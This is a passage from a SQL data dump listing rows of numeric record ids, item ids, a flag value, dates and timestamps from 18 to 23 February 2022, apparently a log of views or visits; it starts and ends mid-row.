08:15:20'),(45441,1594,1,'2022-02-18','2022-02-18 08:30:49'),(45442,1594,1,'2022-02-18','2022-02-18 08:31:00'),(45443,470,1,'2022-02-18','2022-02-18 08:44:59'),(45444,473,1,'2022-02-18','2022-02-18 08:49:51'),(45445,2956,1,'2022-02-18','2022-02-18 09:00:04'),(45446,2309,1,'2022-02-18','2022-02-18 09:14:59'),(45447,570,1,'2022-02-18','2022-02-18 11:28:53'),(45448,2159,1,'2022-02-18','2022-02-18 12:06:12'),(45449,1586,1,'2022-02-18','2022-02-18 12:40:35'),(45450,2159,1,'2022-02-18','2022-02-18 13:00:53'),(45451,2813,1,'2022-02-18','2022-02-18 14:12:08'),(45452,1602,1,'2022-02-18','2022-02-18 14:14:45'),(45453,3691,1,'2022-02-18','2022-02-18 14:26:08'),(45454,1602,1,'2022-02-18','2022-02-18 14:34:06'),(45455,72,1,'2022-02-18','2022-02-18 14:48:57'),(45456,1582,1,'2022-02-18','2022-02-18 14:53:14'),(45457,4432,1,'2022-02-18','2022-02-18 14:59:37'),(45458,1594,1,'2022-02-18','2022-02-18 15:12:56'),(45459,1602,1,'2022-02-18','2022-02-18 15:17:16'),(45460,1602,1,'2022-02-18','2022-02-18 15:18:17'),(45461,1602,1,'2022-02-18','2022-02-18 15:20:18'),(45462,1602,1,'2022-02-18','2022-02-18 15:22:29'),(45463,1600,1,'2022-02-18','2022-02-18 15:40:21'),(45464,3006,1,'2022-02-18','2022-02-18 15:59:52'),(45465,1582,1,'2022-02-18','2022-02-18 16:10:22'),(45466,2609,1,'2022-02-18','2022-02-18 16:41:55'),(45467,2159,1,'2022-02-18','2022-02-18 16:55:27'),(45468,1596,1,'2022-02-18','2022-02-18 16:56:25'),(45469,1586,1,'2022-02-18','2022-02-18 16:58:24'),(45470,1594,1,'2022-02-18','2022-02-18 17:03:08'),(45471,1602,1,'2022-02-18','2022-02-18 17:18:10'),(45472,3691,1,'2022-02-18','2022-02-18 17:25:25'),(45473,2769,1,'2022-02-18','2022-02-18 17:33:24'),(45474,1598,1,'2022-02-18','2022-02-18 17:45:03'),(45475,1776,1,'2022-02-18','2022-02-18 17:55:26'),(45476,2159,1,'2022-02-18','2022-02-18 17:55:27'),(45477,1614,1,'2022-02-18','2022-02-18 18:10:27'),(45478,4524,1,'2022-02-18','2022-02-18 18:27:04'),(45479,3030,1,'2022-02-18','2022-02-18 18:44:37'),(45480,1592,1,'2022-02-18','2022-02-18 18:59:52'),(45481,3781,1,'2022-02-18','2022-02-18 19:25:34'),(45482,1606,1,'2022-02-18','2022-02-18 19:56:39'),(45483,1612,1,'2022-02-18','2022-02-18 20:22:30'),(45484,570,1,'2022-02-18','2022-02-18 20:33:04'),(45485,3764,1,'2022-02-18','2022-02-18 20:57:30'),(45486,3038,1,'2022-02-18','2022-02-18 21:28:59'),(45487,2159,1,'2022-02-18','2022-02-18 21:55:02'),(45488,1594,1,'2022-02-18','2022-02-18 22:17:28'),(45489,2410,1,'2022-02-18','2022-02-18 22:25:28'),(45490,469,1,'2022-02-18','2022-02-18 22:55:27'),(45491,3664,1,'2022-02-18','2022-02-18 23:24:33'),(45492,2617,1,'2022-02-18','2022-02-18 23:55:25'),(45493,1726,1,'2022-02-18','2022-02-18 23:56:12'),(45494,2993,1,'2022-02-19','2022-02-19 01:54:32'),(45495,68,1,'2022-02-19','2022-02-19 02:37:55'),(45496,1592,1,'2022-02-19','2022-02-19 03:43:44'),(45497,1600,1,'2022-02-19','2022-02-19 04:26:19'),(45498,3742,1,'2022-02-19','2022-02-19 05:06:51'),(45499,1582,1,'2022-02-19','2022-02-19 05:32:31'),(45500,2159,1,'2022-02-19','2022-02-19 05:34:59'),(45501,2159,1,'2022-02-19','2022-02-19 05:35:35'),(45502,1598,1,'2022-02-19','2022-02-19 05:53:55'),(45503,469,1,'2022-02-19','2022-02-19 06:26:29'),(45504,570,1,'2022-02-19','2022-02-19 06:50:39'),(45505,472,1,'2022-02-19','2022-02-19 07:12:52'),(45506,468,1,'2022-02-19','2022-02-19 07:41:40'),(45507,1877,1,'2022-02-19','2022-02-19 07:45:08'),(45508,1592,1,'2022-02-19','2022-02-19 07:46:49'),(45509,2420,1,'2022-02-19','2022-02-19 09:29:44'),(45510,1594,1,'2022-02-19','2022-02-19 09:34:13'),(45511,3698,1,'2022-02-19','2022-02-19 09:54:47'),(45512,4457,1,'2022-02-19','2022-02-19 10:27:02'),(45513,3041,1,'2022-02-19','2022-02-19 10:56:29'),(45514,472,1,'2022-02-19','2022-02-19 10:58:30'),(45515,2248,1,'2022-02-19','2022-02-19 11:28:38'),(45516,3097,1,'2022-02-19','2022-02-19 11:53:10'),(45517,1600,1,'2022-02-19','2022-02-19 12:19:40'),(45518,3721,1,'2022-02-19','2022-02-19 12:30:59'),(45519,3764,1,'2022-02-19','2022-02-19 12:39:13'),(45520,1718,1,'2022-02-19','2022-02-19 12:39:16'),(45521,80,1,'2022-02-19','2022-02-19 12:41:24'),(45522,2457,1,'2022-02-19','2022-02-19 13:03:46'),(45523,469,1,'2022-02-19','2022-02-19 13:11:16'),(45524,1602,1,'2022-02-19','2022-02-19 13:36:59'),(45525,2411,1,'2022-02-19','2022-02-19 14:43:17'),(45526,4424,1,'2022-02-19','2022-02-19 15:13:22'),(45527,1600,1,'2022-02-19','2022-02-19 15:23:51'),(45528,3107,1,'2022-02-19','2022-02-19 15:52:35'),(45529,80,1,'2022-02-19','2022-02-19 16:08:12'),(45530,1588,1,'2022-02-19','2022-02-19 16:10:04'),(45531,488,1,'2022-02-19','2022-02-19 16:13:15'),(45532,3107,1,'2022-02-19','2022-02-19 16:44:28'),(45533,1612,1,'2022-02-19','2022-02-19 17:30:06'),(45534,80,1,'2022-02-19','2022-02-19 18:10:05'),(45535,1590,1,'2022-02-19','2022-02-19 18:18:41'),(45536,2503,1,'2022-02-19','2022-02-19 19:10:04'),(45537,4440,1,'2022-02-19','2022-02-19 19:18:42'),(45538,1782,1,'2022-02-19','2022-02-19 20:18:42'),(45539,3127,1,'2022-02-19','2022-02-19 20:40:05'),(45540,1604,1,'2022-02-19','2022-02-19 21:22:05'),(45541,1588,1,'2022-02-19','2022-02-19 21:34:06'),(45542,1598,1,'2022-02-19','2022-02-19 21:58:05'),(45543,1598,1,'2022-02-19','2022-02-19 22:10:10'),(45544,3285,1,'2022-02-19','2022-02-19 22:22:31'),(45545,1604,1,'2022-02-19','2022-02-19 22:34:18'),(45546,72,1,'2022-02-19','2022-02-19 22:46:07'),(45547,1612,1,'2022-02-19','2022-02-19 22:58:06'),(45548,3316,1,'2022-02-19','2022-02-19 23:10:22'),(45549,108,1,'2022-02-19','2022-02-19 23:27:19'),(45550,1606,1,'2022-02-19','2022-02-19 23:27:28'),(45551,1600,1,'2022-02-19','2022-02-19 23:57:25'),(45552,80,1,'2022-02-20','2022-02-20 00:18:38'),(45553,108,1,'2022-02-20','2022-02-20 00:27:10'),(45554,2813,1,'2022-02-20','2022-02-20 05:14:43'),(45555,2309,1,'2022-02-20','2022-02-20 05:14:46'),(45556,1596,1,'2022-02-20','2022-02-20 05:14:47'),(45557,2658,1,'2022-02-20','2022-02-20 05:19:35'),(45558,2658,1,'2022-02-20','2022-02-20 05:20:50'),(45559,3030,1,'2022-02-20','2022-02-20 05:24:03'),(45560,1582,1,'2022-02-20','2022-02-20 05:33:44'),(45561,3030,1,'2022-02-20','2022-02-20 05:42:28'),(45562,3253,1,'2022-02-20','2022-02-20 05:46:36'),(45563,1614,1,'2022-02-20','2022-02-20 05:51:45'),(45564,1872,1,'2022-02-20','2022-02-20 06:01:07'),(45565,2411,1,'2022-02-20','2022-02-20 06:14:42'),(45566,1614,1,'2022-02-20','2022-02-20 06:28:44'),(45567,4424,1,'2022-02-20','2022-02-20 06:44:48'),(45568,4424,1,'2022-02-20','2022-02-20 06:45:13'),(45569,2804,1,'2022-02-20','2022-02-20 06:49:56'),(45570,488,1,'2022-02-20','2022-02-20 07:14:42'),(45571,4524,1,'2022-02-20','2022-02-20 07:32:38'),(45572,4436,1,'2022-02-20','2022-02-20 07:42:56'),(45573,3117,1,'2022-02-20','2022-02-20 07:59:28'),(45574,469,1,'2022-02-20','2022-02-20 08:01:45'),(45575,1711,1,'2022-02-20','2022-02-20 08:02:49'),(45576,2297,1,'2022-02-20','2022-02-20 08:07:44'),(45577,1586,1,'2022-02-20','2022-02-20 08:46:44'),(45578,1602,1,'2022-02-20','2022-02-20 09:12:48'),(45579,2150,1,'2022-02-20','2022-02-20 09:37:44'),(45580,1592,1,'2022-02-20','2022-02-20 09:47:08'),(45581,2297,1,'2022-02-20','2022-02-20 10:07:56'),(45582,1586,1,'2022-02-20','2022-02-20 10:24:45'),(45583,91,1,'2022-02-20','2022-02-20 10:37:47'),(45584,1610,1,'2022-02-20','2022-02-20 10:55:29'),(45585,473,1,'2022-02-20','2022-02-20 11:07:44'),(45586,1594,1,'2022-02-20','2022-02-20 11:14:29'),(45587,472,1,'2022-02-20','2022-02-20 11:31:54'),(45588,2309,1,'2022-02-20','2022-02-20 11:46:35'),(45589,487,1,'2022-02-20','2022-02-20 11:54:12'),(45590,473,1,'2022-02-20','2022-02-20 11:54:13'),(45591,487,1,'2022-02-20','2022-02-20 11:54:17'),(45592,473,1,'2022-02-20','2022-02-20 11:54:17'),(45593,2457,1,'2022-02-20','2022-02-20 11:55:33'),(45594,470,1,'2022-02-20','2022-02-20 12:11:29'),(45595,3781,1,'2022-02-20','2022-02-20 12:26:37'),(45596,2956,1,'2022-02-20','2022-02-20 12:53:31'),(45597,1592,1,'2022-02-20','2022-02-20 13:06:09'),(45598,1776,1,'2022-02-20','2022-02-20 14:45:35'),(45599,1600,1,'2022-02-20','2022-02-20 16:40:26'),(45600,3087,1,'2022-02-20','2022-02-20 17:54:35'),(45601,1594,1,'2022-02-20','2022-02-20 18:33:22'),(45602,1600,1,'2022-02-20','2022-02-20 18:49:21'),(45603,1586,1,'2022-02-20','2022-02-20 18:57:13'),(45604,1598,1,'2022-02-20','2022-02-20 19:05:39'),(45605,2159,1,'2022-02-20','2022-02-20 19:16:19'),(45606,3781,1,'2022-02-20','2022-02-20 19:34:51'),(45607,1586,1,'2022-02-20','2022-02-20 19:37:16'),(45608,2159,1,'2022-02-20','2022-02-20 19:45:26'),(45609,1606,1,'2022-02-20','2022-02-20 19:48:20'),(45610,2410,1,'2022-02-20','2022-02-20 20:03:18'),(45611,2410,1,'2022-02-20','2022-02-20 20:04:20'),(45612,1600,1,'2022-02-20','2022-02-20 20:07:14'),(45613,1600,1,'2022-02-20','2022-02-20 20:08:22'),(45614,1582,1,'2022-02-20','2022-02-20 21:18:31'),(45615,4485,1,'2022-02-20','2022-02-20 21:58:52'),(45616,2159,1,'2022-02-20','2022-02-20 22:00:00'),(45617,2159,1,'2022-02-20','2022-02-20 22:00:20'),(45618,2159,1,'2022-02-20','2022-02-20 22:00:36'),(45619,2904,1,'2022-02-20','2022-02-20 22:05:51'),(45620,2904,1,'2022-02-20','2022-02-20 22:06:22'),(45621,2904,1,'2022-02-20','2022-02-20 22:06:29'),(45622,2159,1,'2022-02-20','2022-02-20 22:06:48'),(45623,1877,1,'2022-02-20','2022-02-20 22:09:13'),(45624,3285,1,'2022-02-20','2022-02-20 22:54:30'),(45625,3691,1,'2022-02-20','2022-02-20 23:09:43'),(45626,3764,1,'2022-02-20','2022-02-20 23:19:37'),(45627,469,1,'2022-02-20','2022-02-20 23:43:31'),(45628,4514,1,'2022-02-20','2022-02-20 23:58:19'),(45629,1877,1,'2022-02-21','2022-02-21 00:13:33'),(45630,4520,1,'2022-02-21','2022-02-21 00:14:41'),(45631,1606,1,'2022-02-21','2022-02-21 00:18:26'),(45632,1707,1,'2022-02-21','2022-02-21 00:38:18'),(45633,467,1,'2022-02-21','2022-02-21 00:53:31'),(45634,2956,1,'2022-02-21','2022-02-21 01:38:19'),(45635,3127,1,'2022-02-21','2022-02-21 01:53:30'),(45636,483,1,'2022-02-21','2022-02-21 02:16:35'),(45637,468,1,'2022-02-21','2022-02-21 02:21:26'),(45638,1726,1,'2022-02-21','2022-02-21 02:25:43'),(45639,3664,1,'2022-02-21','2022-02-21 03:25:22'),(45640,2993,1,'2022-02-21','2022-02-21 03:55:24'),(45641,1707,1,'2022-02-21','2022-02-21 04:00:33'),(45642,3069,1,'2022-02-21','2022-02-21 04:40:56'),(45643,68,1,'2022-02-21','2022-02-21 04:41:29'),(45644,68,1,'2022-02-21','2022-02-21 04:41:48'),(45645,68,1,'2022-02-21','2022-02-21 04:41:49'),(45646,68,1,'2022-02-21','2022-02-21 04:44:30'),(45647,68,1,'2022-02-21','2022-02-21 04:44:45'),(45648,1602,1,'2022-02-21','2022-02-21 05:03:25'),(45649,3694,1,'2022-02-21','2022-02-21 05:25:45'),(45650,1594,1,'2022-02-21','2022-02-21 05:26:19'),(45651,2617,1,'2022-02-21','2022-02-21 05:34:09'),(45652,2395,1,'2022-02-21','2022-02-21 06:01:43'),(45653,3787,1,'2022-02-21','2022-02-21 06:08:31'),(45654,2769,1,'2022-02-21','2022-02-21 06:18:30'),(45655,80,1,'2022-02-21','2022-02-21 07:00:44'),(45656,3253,1,'2022-02-21','2022-02-21 07:06:41'),(45657,3253,1,'2022-02-21','2022-02-21 07:06:58'),(45658,3253,1,'2022-02-21','2022-02-21 07:07:17'),(45659,473,1,'2022-02-21','2022-02-21 07:28:24'),(45660,1582,1,'2022-02-21','2022-02-21 07:50:17'),(45661,469,1,'2022-02-21','2022-02-21 08:09:20'),(45662,469,1,'2022-02-21','2022-02-21 08:10:45'),(45663,1596,1,'2022-02-21','2022-02-21 08:18:58'),(45664,472,1,'2022-02-21','2022-02-21 08:39:19'),(45665,3698,1,'2022-02-21','2022-02-21 09:06:26'),(45666,2769,1,'2022-02-21','2022-02-21 09:17:41'),(45667,1877,1,'2022-02-21','2022-02-21 09:20:02'),(45668,68,1,'2022-02-21','2022-02-21 09:22:26'),(45669,76,1,'2022-02-21','2022-02-21 09:22:54'),(45670,68,1,'2022-02-21','2022-02-21 09:25:03'),(45671,1608,1,'2022-02-21','2022-02-21 09:36:19'),(45672,1720,1,'2022-02-21','2022-02-21 09:46:07'),(45673,1588,1,'2022-02-21','2022-02-21 09:54:22'),(45674,467,1,'2022-02-21','2022-02-21 10:03:29'),(45675,1608,1,'2022-02-21','2022-02-21 10:06:22'),(45676,3787,1,'2022-02-21','2022-02-21 10:28:36'),(45677,80,1,'2022-02-21','2022-02-21 10:45:50'),(45678,3041,1,'2022-02-21','2022-02-21 11:06:28'),(45679,2989,1,'2022-02-21','2022-02-21 11:12:50'),(45680,2617,1,'2022-02-21','2022-02-21 11:20:01'),(45681,3005,1,'2022-02-21','2022-02-21 11:29:15'),(45682,3005,1,'2022-02-21','2022-02-21 11:29:24'),(45683,3005,1,'2022-02-21','2022-02-21 11:29:25'),(45684,468,1,'2022-02-21','2022-02-21 11:58:15'),(45685,3072,1,'2022-02-21','2022-02-21 12:08:51'),(45686,1586,1,'2022-02-21','2022-02-21 12:29:40'),(45687,3124,1,'2022-02-21','2022-02-21 12:36:27'),(45688,3764,1,'2022-02-21','2022-02-21 12:36:32'),(45689,4529,1,'2022-02-21','2022-02-21 12:36:33'),(45690,4524,1,'2022-02-21','2022-02-21 12:36:38'),(45691,2309,1,'2022-02-21','2022-02-21 14:12:20'),(45692,1598,1,'2022-02-21','2022-02-21 14:42:37'),(45693,2457,1,'2022-02-21','2022-02-21 14:47:51'),(45694,91,1,'2022-02-21','2022-02-21 14:49:03'),(45695,87,1,'2022-02-21','2022-02-21 14:56:12'),(45696,1600,1,'2022-02-21','2022-02-21 15:18:10'),(45697,2309,1,'2022-02-21','2022-02-21 15:40:41'),(45698,3102,1,'2022-02-21','2022-02-21 16:18:07'),(45699,3107,1,'2022-02-21','2022-02-21 16:36:21'),(45700,470,1,'2022-02-21','2022-02-21 16:48:40'),(45701,2411,1,'2022-02-21','2022-02-21 16:58:14'),(45702,1596,1,'2022-02-21','2022-02-21 17:36:38'),(45703,3287,1,'2022-02-21','2022-02-21 18:31:05'),(45704,1588,1,'2022-02-21','2022-02-21 18:47:50'),(45705,1582,1,'2022-02-21','2022-02-21 19:28:10'),(45706,1590,1,'2022-02-21','2022-02-21 19:39:54'),(45707,1612,1,'2022-02-21','2022-02-21 19:47:49'),(45708,1782,1,'2022-02-21','2022-02-21 20:10:16'),(45709,2309,1,'2022-02-21','2022-02-21 20:18:53'),(45710,2309,1,'2022-02-21','2022-02-21 20:19:30'),(45711,2309,1,'2022-02-21','2022-02-21 20:19:44'),(45712,2503,1,'2022-02-21','2022-02-21 20:27:51'),(45713,3261,1,'2022-02-21','2022-02-21 20:39:53'),(45714,1600,1,'2022-02-21','2022-02-21 21:50:24'),(45715,1586,1,'2022-02-21','2022-02-21 22:03:49'),(45716,1870,1,'2022-02-21','2022-02-21 22:23:51'),(45717,473,1,'2022-02-21','2022-02-21 22:23:51'),(45718,1588,1,'2022-02-21','2022-02-21 22:58:35'),(45719,1598,1,'2022-02-21','2022-02-21 22:59:23'),(45720,1612,1,'2022-02-21','2022-02-21 23:10:11'),(45721,1877,1,'2022-02-21','2022-02-21 23:32:47'),(45722,1877,1,'2022-02-21','2022-02-21 23:33:54'),(45723,2309,1,'2022-02-22','2022-02-22 00:04:11'),(45724,2309,1,'2022-02-22','2022-02-22 00:04:27'),(45725,2309,1,'2022-02-22','2022-02-22 00:05:02'),(45726,3316,1,'2022-02-22','2022-02-22 00:07:23'),(45727,1600,1,'2022-02-22','2022-02-22 00:10:43'),(45728,1602,1,'2022-02-22','2022-02-22 00:12:21'),(45729,1608,1,'2022-02-22','2022-02-22 00:14:28'),(45730,68,1,'2022-02-22','2022-02-22 00:14:56'),(45731,76,1,'2022-02-22','2022-02-22 00:15:18'),(45732,89,1,'2022-02-22','2022-02-22 00:15:54'),(45733,1602,1,'2022-02-22','2022-02-22 00:16:10'),(45734,1598,1,'2022-02-22','2022-02-22 00:19:06'),(45735,89,1,'2022-02-22','2022-02-22 00:22:07'),(45736,1598,1,'2022-02-22','2022-02-22 00:22:14'),(45737,89,1,'2022-02-22','2022-02-22 00:28:13'),(45738,1588,1,'2022-02-22','2022-02-22 00:28:23'),(45739,4400,1,'2022-02-22','2022-02-22 00:36:19'),(45740,108,1,'2022-02-22','2022-02-22 00:37:17'),(45741,89,1,'2022-02-22','2022-02-22 00:39:56'),(45742,1584,1,'2022-02-22','2022-02-22 00:40:14'),(45743,89,1,'2022-02-22','2022-02-22 00:43:29'),(45744,1592,1,'2022-02-22','2022-02-22 00:43:42'),(45745,89,1,'2022-02-22','2022-02-22 00:49:51'),(45746,1606,1,'2022-02-22','2022-02-22 00:50:18'),(45747,89,1,'2022-02-22','2022-02-22 00:50:24'),(45748,89,1,'2022-02-22','2022-02-22 00:50:29'),(45749,2457,1,'2022-02-22','2022-02-22 00:50:47'),(45750,89,1,'2022-02-22','2022-02-22 00:54:52'),(45751,4457,1,'2022-02-22','2022-02-22 00:55:09'),(45752,89,1,'2022-02-22','2022-02-22 00:57:26'),(45753,3006,1,'2022-02-22','2022-02-22 00:57:36'),(45754,89,1,'2022-02-22','2022-02-22 00:57:49'),(45755,1610,1,'2022-02-22','2022-02-22 00:57:58'),(45756,89,1,'2022-02-22','2022-02-22 00:58:06'),(45757,89,1,'2022-02-22','2022-02-22 00:58:19'),(45758,1544,1,'2022-02-22','2022-02-22 00:58:27'),(45759,89,1,'2022-02-22','2022-02-22 01:02:11'),(45760,1594,1,'2022-02-22','2022-02-22 01:02:17'),(45761,3102,1,'2022-02-22','2022-02-22 01:02:55'),(45762,89,1,'2022-02-22','2022-02-22 01:06:18'),(45763,1608,1,'2022-02-22','2022-02-22 01:06:33'),(45764,2609,1,'2022-02-22','2022-02-22 04:28:07'),(45765,1604,1,'2022-02-22','2022-02-22 05:03:46'),(45766,1596,1,'2022-02-22','2022-02-22 05:03:50'),(45767,2297,1,'2022-02-22','2022-02-22 05:03:57'),(45768,4424,1,'2022-02-22','2022-02-22 06:03:49'),(45769,1614,1,'2022-02-22','2022-02-22 06:04:00'),(45770,2704,1,'2022-02-22','2022-02-22 06:04:30'),(45771,2804,1,'2022-02-22','2022-02-22 06:33:47'),(45772,2813,1,'2022-02-22','2022-02-22 06:59:29'),(45773,2309,1,'2022-02-22','2022-02-22 07:14:28'),(45774,1594,1,'2022-02-22','2022-02-22 07:59:23'),(45775,3253,1,'2022-02-22','2022-02-22 07:59:25'),(45776,4556,1,'2022-02-22','2022-02-22 08:08:50'),(45777,4524,1,'2022-02-22','2022-02-22 08:14:24'),(45778,1594,1,'2022-02-22','2022-02-22 09:41:18'),(45779,80,1,'2022-02-22','2022-02-22 09:42:30'),(45780,1594,1,'2022-02-22','2022-02-22 09:43:16'),(45781,3694,1,'2022-02-22','2022-02-22 10:04:13'),(45782,4520,1,'2022-02-22','2022-02-22 10:47:46'),(45783,1877,1,'2022-02-22','2022-02-22 11:25:11'),(45784,2309,1,'2022-02-22','2022-02-22 11:37:48'),(45785,2911,1,'2022-02-22','2022-02-22 13:04:35'),(45786,2309,1,'2022-02-22','2022-02-22 13:04:37'),(45787,1614,1,'2022-02-22','2022-02-22 13:36:49'),(45788,2457,1,'2022-02-22','2022-02-22 14:04:27'),(45789,1745,1,'2022-02-22','2022-02-22 14:04:30'),(45790,1594,1,'2022-02-22','2022-02-22 14:20:13'),(45791,1592,1,'2022-02-22','2022-02-22 14:20:57'),(45792,1594,1,'2022-02-22','2022-02-22 14:23:42'),(45793,470,1,'2022-02-22','2022-02-22 14:48:41'),(45794,474,1,'2022-02-22','2022-02-22 15:03:29'),(45795,473,1,'2022-02-22','2022-02-22 15:07:03'),(45796,1872,1,'2022-02-22','2022-02-22 15:18:35'),(45797,68,1,'2022-02-22','2022-02-22 15:29:04'),(45798,2904,1,'2022-02-22','2022-02-22 15:32:07'),(45799,3285,1,'2022-02-22','2022-02-22 15:37:08'),(45800,2904,1,'2022-02-22','2022-02-22 15:40:44'),(45801,2904,1,'2022-02-22','2022-02-22 15:50:57'),(45802,68,1,'2022-02-22','2022-02-22 15:51:03'),(45803,3127,1,'2022-02-22','2022-02-22 16:04:04'),(45804,68,1,'2022-02-22','2022-02-22 16:10:09'),(45805,1608,1,'2022-02-22','2022-02-22 16:27:32'),(45806,1592,1,'2022-02-22','2022-02-22 16:31:04'),(45807,1728,1,'2022-02-22','2022-02-22 17:47:40'),(45808,1594,1,'2022-02-22','2022-02-22 17:52:32'),(45809,1612,1,'2022-02-22','2022-02-22 18:01:06'),(45810,80,1,'2022-02-22','2022-02-22 18:03:41'),(45811,1612,1,'2022-02-22','2022-02-22 18:10:28'),(45812,2395,1,'2022-02-22','2022-02-22 18:53:29'),(45813,3087,1,'2022-02-22','2022-02-22 19:05:05'),(45814,1602,1,'2022-02-22','2022-02-22 19:11:48'),(45815,472,1,'2022-02-22','2022-02-22 19:48:29'),(45816,1776,1,'2022-02-22','2022-02-22 20:04:04'),(45817,1776,1,'2022-02-22','2022-02-22 20:04:46'),(45818,1776,1,'2022-02-22','2022-02-22 20:05:19'),(45819,1594,1,'2022-02-22','2022-02-22 20:06:45'),(45820,468,1,'2022-02-22','2022-02-22 20:19:02'),(45821,1614,1,'2022-02-22','2022-02-22 20:20:29'),(45822,468,1,'2022-02-22','2022-02-22 20:20:37'),(45823,1598,1,'2022-02-22','2022-02-22 20:43:23'),(45824,2159,1,'2022-02-22','2022-02-22 20:53:25'),(45825,1600,1,'2022-02-22','2022-02-22 21:03:36'),(45826,4416,1,'2022-02-22','2022-02-22 21:42:29'),(45827,2410,1,'2022-02-22','2022-02-22 22:25:39'),(45828,2410,1,'2022-02-22','2022-02-22 22:25:41'),(45829,3781,1,'2022-02-22','2022-02-22 22:50:58'),(45830,3257,1,'2022-02-22','2022-02-22 23:06:34'),(45831,76,1,'2022-02-22','2022-02-22 23:06:34'),(45832,1606,1,'2022-02-22','2022-02-22 23:07:11'),(45833,3764,1,'2022-02-23','2022-02-23 00:23:31'),(45834,1592,1,'2022-02-23','2022-02-23 01:15:42'),(45835,4457,1,'2022-02-23','2022-02-23 01:17:35'),(45836,3764,1,'2022-02-23','2022-02-23 01:21:34'),(45837,469,1,'2022-02-23','2022-02-23 01:27:21'),(45838,3069,1,'2022-02-23','2022-02-23 01:34:06'),(45839,2420,1,'2022-02-23','2022-02-23 01:41:57'),(45840,1582,1,'2022-02-23','2022-02-23 01:45:14'),(45841,3069,1,'2022-02-23','2022-02-23 02:09:54'),(45842,3710,1,'2022-02-23','2022-02-23 02:22:34'),(45843,3269,1,'2022-02-23','2022-02-23 02:33:09'),(45844,1877,1,'2022-02-23','2022-02-23 02:45:09'),(45845,3664,1,'2022-02-23','2022-02-23 04:08:08'),(45846,1602,1,'2022-02-23','2022-02-23 05:40:12'),(45847,3764,1,'2022-02-23','2022-02-23 05:49:57'),(45848,1602,1,'2022-02-23','2022-02-23 06:48:30'),(45849,3710,1,'2022-02-23','2022-02-23 06:49:55'),(45850,3127,1,'2022-02-23','2022-02-23 07:06:04'),(45851,1586,1,'2022-02-23','2022-02-23 07:08:10'),(45852,3691,1,'2022-02-23','2022-02-23 07:12:11'),(45853,3030,1,'2022-02-23','2022-02-23 07:18:11'),(45854,2617,1,'2022-02-23','2022-02-23 07:20:10'),(45855,2704,1,'2022-02-23','2022-02-23 08:00:41'),(45856,1586,1,'2022-02-23','2022-02-23 08:04:43'),(45857,2395,1,'2022-02-23','2022-02-23 08:08:42'),(45858,570,1,'2022-02-23','2022-02-23 08:12:42'),(45859,3691,1,'2022-02-23','2022-02-23 08:16:46'),(45860,3438,1,'2022-02-23','2022-02-23 08:20:42'),(45861,2609,1,'2022-02-23','2022-02-23 08:33:38'),(45862,3498,1,'2022-02-23','2022-02-23 08:36:41'),(45863,3030,1,'2022-02-23','2022-02-23 08:40:47'),(45864,3781,1,'2022-02-23','2022-02-23 09:15:16'),(45865,1602,1,'2022-02-23','2022-02-23 09:15:28'),(45866,469,1,'2022-02-23','2022-02-23 09:29:50'),(45867,472,1,'2022-02-23','2022-02-23 09:37:09'),(45868,2769,1,'2022-02-23','2022-02-23 09:44:28'),(45869,2395,1,'2022-02-23','2022-02-23 09:51:04'),(45870,3290,1,'2022-02-23','2022-02-23 09:51:07'),(45871,1604,1,'2022-02-23','2022-02-23 09:51:35'),(45872,80,1,'2022-02-23','2022-02-23 09:51:42'),(45873,91,1,'2022-02-23','2022-02-23 09:52:11'),(45874,1877,1,'2022-02-23','2022-02-23 09:58:58'),(45875,3117,1,'2022-02-23','2022-02-23 10:20:51'),(45876,4514,1,'2022-02-23','2022-02-23 10:28:04'),(45877,1877,1,'2022-02-23','2022-02-23 10:28:14'),(45878,473,1,'2022-02-23','2022-02-23 10:28:14'),(45879,1588,1,'2022-02-23','2022-02-23 10:49:57'),(45880,2989,1,'2022-02-23','2022-02-23 10:57:13'),(45881,1582,1,'2022-02-23','2022-02-23 11:00:37'),(45882,80,1,'2022-02-23','2022-02-23 11:02:43'),(45883,4457,1,'2022-02-23','2022-02-23 11:04:57'),(45884,4457,1,'2022-02-23','2022-02-23 11:05:50'),(45885,1608,1,'2022-02-23','2022-02-23 11:06:31'),(45886,80,1,'2022-02-23','2022-02-23 11:16:59'),(45887,570,1,'2022-02-23','2022-02-23 11:18:50'),(45888,3787,1,'2022-02-23','2022-02-23 11:44:32'),(45889,467,1,'2022-02-23','2022-02-23 12:04:33'),(45890,1608,1,'2022-02-23','2022-02-23 12:11:12'),(45891,3282,1,'2022-02-23','2022-02-23 12:22:44'),(45892,1588,1,'2022-02-23','2022-02-23 12:30:35'),(45893,3787,1,'2022-02-23','2022-02-23 12:44:32'),(45894,3479,1,'2022-02-23','2022-02-23 13:04:20'),(45895,1722,1,'2022-02-23','2022-02-23 13:26:25'),(45896,1722,1,'2022-02-23','2022-02-23 13:27:50'),(45897,1594,1,'2022-02-23','2022-02-23 13:45:38'),(45898,3102,1,'2022-02-23','2022-02-23 15:26:48'),(45899,2813,1,'2022-02-23','2022-02-23 16:01:26'),(45900,3005,1,'2022-02-23','2022-02-23 16:08:27'),(45901,2609,1,'2022-02-23','2022-02-23 16:10:07'),(45902,4301,1,'2022-02-23','2022-02-23 16:17:58'),(45903,570,1,'2022-02-23','2022-02-23 16:29:13'),(45904,80,1,'2022-02-23','2022-02-23 17:00:43'),(45905,1606,1,'2022-02-23','2022-02-23 17:29:12'),(45906,68,1,'2022-02-23','2022-02-23 18:03:18'),(45907,2989,1,'2022-02-23','2022-02-23 18:22:52'),(45908,2410,1,'2022-02-23','2022-02-23 18:44:50'),(45909,1602,1,'2022-02-23','2022-02-23 19:15:54'),(45910,1602,1,'2022-02-23','2022-02-23 19:16:56'),(45911,2617,1,'2022-02-23','2022-02-23 19:24:12'),(45912,68,1,'2022-02-23','2022-02-23 19:25:07'),(45913,80,1,'2022-02-23','2022-02-23 19:37:28'),(45914,570,1,'2022-02-23','2022-02-23 20:04:08'),(45915,1588,1,'2022-02-23','2022-02-23 20:24:10'),(45916,3072,1,'2022-02-23','2022-02-23 20:24:55'),(45917,468,1,'2022-02-23','2022-02-23 20:41:48'),(45918,4404,1,'2022-02-23','2022-02-23 20:43:39'),(45919,1606,1,'2022-02-23','2022-02-23 21:00:10'),(45920,470,1,'2022-02-23','2022-02-23 21:18:09'),(45921,467,1,'2022-02-23','2022-02-23 21:25:23'),(45922,2457,1,'2022-02-23','2022-02-23 21:48:23'),(45923,1582,1,'2022-02-23','2022-02-23 22:00:15'),(45924,3261,1,'2022-02-23','2022-02-23 22:11:17'),(45925,1612,1,'2022-02-23','2022-02-23 22:12:14'),(45926,2503,1,'2022-02-23','2022-02-23 22:36:21'),(45927,1594,1,'2022-02-23','2022-02-23 